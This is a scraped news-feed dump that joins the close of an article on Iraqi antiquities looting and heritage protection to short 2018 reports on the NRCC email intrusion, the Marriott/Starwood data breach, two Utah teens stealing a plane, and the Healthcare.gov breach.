Evangelos Kyriakidis, director, Heritage Management Organization

Organizations such as the Association for Research Into Crimes Against Art (ARCA) and the Heritage Management Organization, associated with the University of Kent, are developing comprehensive strategies to meet the challenge. This year, ARCA created a Minerva scholarship to train heritage workers from Iraq, Syria, Yemen and Libya during a 10-week summer program. Heritage has partnered with local communities to train them in preventing the theft of antique treasures, a model that has worked in the highlands of Crete, says Heritage director Evangelos Kyriakidis.

“If anything is excavated illegally from anywhere in the area, the first people who will stop it are the locals themselves,” says Kyriakidis.

The challenge remains massive, with historians trying to recover 8,000 of the 15,000 objects still missing from a 36-hour stealing spree that occurred as U.S. forces marched on Baghdad in April 2003 — and that was just at the Iraq Museum.

Gettyimages 109110454

Plus, the process is still rife with hypocrisy. The British Museum did not respond to requests for comment on the oddness of presenting an anti-looting exhibit using Assyrian valuables that almost assuredly came to the Western world through unsavory means (so far, it has accepted loans of artifacts from museums in Paris, Berlin, Cyprus and St. Petersburg, Russia, to name a few places — and had not reached out to the Iraqi government, according to a July report by Middle East publication, Media Line). And the push for equity from former empire builders like Britain has even become political: In June, U.K. Labour Party leader Jeremy Corbyn promised to return the Parthenon Marbles to Greece if elected prime minister in 2022.

Still, the work of the British Museum is spotlighting the need to develop stronger international tactics for dealing with illegal antiquity trading. The November exhibit will include presentations on the Iraq Emergency Heritage Management Training Scheme, a pilot project for the U.K. Cultural Protection Fund that will train 50 Iraqi heritage staffers in retrieval techniques.

That training is important because local communities are often neither fully cognizant of the benefits of antiques nor capable of preserving them in challenging circumstances. One way to fully get the buy-in of local communities is for museums and cultural officials to foster an appreciation for local heritage and build a tourism market around it, suggests Kyriakidis. This is particularly important in Iraq, he adds, where ISIS has encouraged a looting market as a way to both fund the terrorist organization and help it earn front-page headlines that aid in drafting new followers.

With the retreat of ISIS in Iraq, though, the returning artifacts are safe once more, say experts. “The situation in Iraq seems to be stable, and it is not very likely they will be looted again,” says Kyriakidis. The extra attention has affected dealers, says ARCA CEO Lynda Albertson. “Are they going to hit the market when everyone is staring intently on all pieces with [Assyrian] heritage? Probably not. It’s too soon,” she says, but warns of a temporary fix. “The world focuses on one. The dealer shifts to another. When the focus changes again, the dealers will shift again.”

That’s partly why groups like ARCA and Heritage are trying to move beyond a global approach over the past decade that has focused on changing museum practices and policing private collectors, creating a problem where collectors are often seen as “the enemy,” says Kyriakidis. In fact, he says, most collectors are careful to buy responsibly, and are incredibly invested in the outcome of the antiquities trade — after all, they’ve spent millions to participate in it. In a cooperative effort with the Greek Ministry of Culture, Heritage organized a meeting in 2014 between Greek police and collectors to share information about art deals and clandestine networks.

That model could be replicated in Iraq, Syria and other countries where stakeholders in ancient culture are too often still operating on their own. And it could help the treasures of ancient civilizations like Iraq stay where they belong — at home.

Let’s block ads! (Why?)

]]>
https://briefnews.eu/smuggling-backlash-leads-to-iraqs-stolen-treasures-returning-home/feed/ 0
Thousands of sensitive emails stolen in intrusion of Republican campaign arm https://briefnews.eu/thousands-of-sensitive-emails-stolen-in-intrusion-of-republican-campaign-arm/ https://briefnews.eu/thousands-of-sensitive-emails-stolen-in-intrusion-of-republican-campaign-arm/#respond Tue, 04 Dec 2018 22:41:11 +0000 http://briefnews.eu/thousands-of-sensitive-emails-stolen-in-intrusion-of-republican-campaign-arm/
Thousands of sensitive emails stolen in intrusion of Republican campaign arm

Enlarge (credit: Getty Images | Chris Clor)

An email intrusion targeting a key Republican campaign committee allowed unknown people to steal thousands of sensitive emails from four senior aides, Politico reported Tuesday.

The attack on the National Republican Congressional Committee, the main group that works to elect Republicans to the US House of Representatives, allowed the person or group responsible to monitor the aides’ email accounts for several months, Politico said. The intrusion was detected in April by a managed security services provider the NRCC had retained to monitor the security of its network.

The unnamed provider informed NRCC officials, who in turn alerted security firm Crowdstrike. Crowdstrike, which was called in to investigate the Russian government’s 2016 hack of the Democratic National Committee, had already been retained by the NRCC when the intrusion was discovered in April, Politico said.

Read 5 remaining paragraphs | Comments

]]>
https://briefnews.eu/thousands-of-sensitive-emails-stolen-in-intrusion-of-republican-campaign-arm/feed/ 0
Marriott breach leaves 500 million exposed with passport, card numbers stolen https://briefnews.eu/marriott-breach-leaves-500-million-exposed-with-passport-card-numbers-stolen/ https://briefnews.eu/marriott-breach-leaves-500-million-exposed-with-passport-card-numbers-stolen/#respond Fri, 30 Nov 2018 18:56:44 +0000 http://briefnews.eu/marriott-breach-leaves-500-million-exposed-with-passport-card-numbers-stolen/
W Hotel image

Enlarge / Marriott Hotel brands like the W hotel were breached between 2014 and 2018. (credit: Craig Warga/Bloomberg via Getty Images)

On Friday, Marriott International announced a system breach that has affected approximately 500 million customers, with stolen information including names, credit card numbers, mailing addresses, email addresses, and passport numbers. The breach is one of the largest in history, after recent Yahoo breaches that compromised the accounts of nearly three billion customers.

The breach appears to have originated at Starwood hotels in 2014—two years before Marriott acquired the hotel chain, according to The Washington Post. “When Marriott acquired Starwood in 2016, the existing breach went undetected during the merger and for years afterward,” the Post noted.

Marriott says it confirmed unauthorized access to the Starwood guest reservation database on November 19, which contained guest information dating back to September 10, 2018. The hackers had allegedly copied encrypted information from the Starwood reservation database. When Marriott was able to decrypt the information, the company found that of the approximately 500 million guests that had their name and contact information stolen, a subset of 327 million had “some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest (“SPG”) account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences.”

Read 5 remaining paragraphs | Comments

]]>
https://briefnews.eu/marriott-breach-leaves-500-million-exposed-with-passport-card-numbers-stolen/feed/ 0
GTA Utah: Teens take joyride in a stolen private plane https://briefnews.eu/gta-utah-teens-take-joyride-in-a-stolen-private-plane/ https://briefnews.eu/gta-utah-teens-take-joyride-in-a-stolen-private-plane/#respond Fri, 23 Nov 2018 06:07:58 +0000 http://briefnews.eu/gta-utah-teens-take-joyride-in-a-stolen-private-plane/

Two teenage boys have been arrested after stealing an airplane from a private airstrip in rural Utah.

For rebellious teens across America, ‘borrowing’ someone else’s car for a short ride is something of a right of passage – but two Utah teens took the joyride to new heights, stealing an airplane from a private airstrip and taking to the skies.

The 14 and 15 year old boys had recently left a group home and were staying with friends in the area, according to the Uintah County sheriff’s office. In order to get to the airstrip, the boys first acquisitioned a tractor, which somehow didn’t attract enough attention to thwart the efforts of the determined pair.

After stealing the small single-engine Cessna, the boys flew around 15 miles along highway 40 before making a successful landing at Vernal Regional Airport. How they managed to start, fly and land the plane without incident, remains a mystery. Both are now in custody at the Split Mountain Youth Detention Center. The courts would be advised to consider the two a flight risk.

Like this story? Share it with a friend!

Let’s block ads! (Why?)

]]>
https://briefnews.eu/gta-utah-teens-take-joyride-in-a-stolen-private-plane/feed/ 0
Income, tax and immigration data stolen in Healthcare.gov breach https://briefnews.eu/income-tax-and-immigration-data-stolen-in-healthcare-gov-breach/ https://briefnews.eu/income-tax-and-immigration-data-stolen-in-healthcare-gov-breach/#respond Sat, 10 Nov 2018 02:44:58 +0000 http://briefnews.eu/income-tax-and-immigration-data-stolen-in-healthcare-gov-breach/

The Centers for Medicare and Medicaid Services (CMS) now has details about the data stolen in the breach of Healthcare.gov that occurred last month. According to the government agency, a significant amount of personal information including partial Social Security numbers, tax information and immigration status was compromised in the breach. No financial information was stolen.

In a post hidden on a Healthcare.gov page titled “How we use your data,” the CMS confirmed the breach occurred and said it started to alert via phone call the 75,000 affected people starting November 5th. That notification will be followed by a letter detailing the breach and what information was compromised.

In the letter, CMS discloses the entirety of the information stolen by hackers, and it’s a fairly substantial list of data points:

  • Name, date of birth, address, sex, and the last four digits of the Social Security number (SSN), if SSN was provided on the application;
  • Other information provided on the application, including expected income, tax filing status, family relationships, whether the applicant is a citizen or an immigrant, immigration document types and numbers, employer name, whether the applicant was pregnant, and whether the applicant already had health insurance;
  • Information provided by other federal agencies and data sources to confirm the information provided on the application, and whether the Marketplace asked the applicant for documents or explanations;
  • The results of the application, including whether the applicant was eligible to enroll in a qualified health plan (QHP), and if eligible, the tax credit amount; and
  • If the applicant enrolled, the name of the insurance plan, the premium, and dates of coverage.

The letter does note that bank account numbers and credit card numbers were not compromised. Any diagnosis or treatment information was also inaccessible the hackers. This is also not the first time Healthcare.gov has suffered from a breach, though no sensitive data had previously been stolen.

The original breach was discovered on October 16th, when CMS spotted agent and broker accounts performing excessive searches for consumers. Through those searches, it was possible to gain access to personal information of people listed on Healthcare.gov Marketplace applications. CMS has since shut down the agent and broker accounts involved in the searches. Agent and broker functions have also been shut off until additional security improvements are made.

Via: TechCrunch

Source: Centers for Medicare and Medicaid Services

]]>
https://briefnews.eu/income-tax-and-immigration-data-stolen-in-healthcare-gov-breach/feed/ 0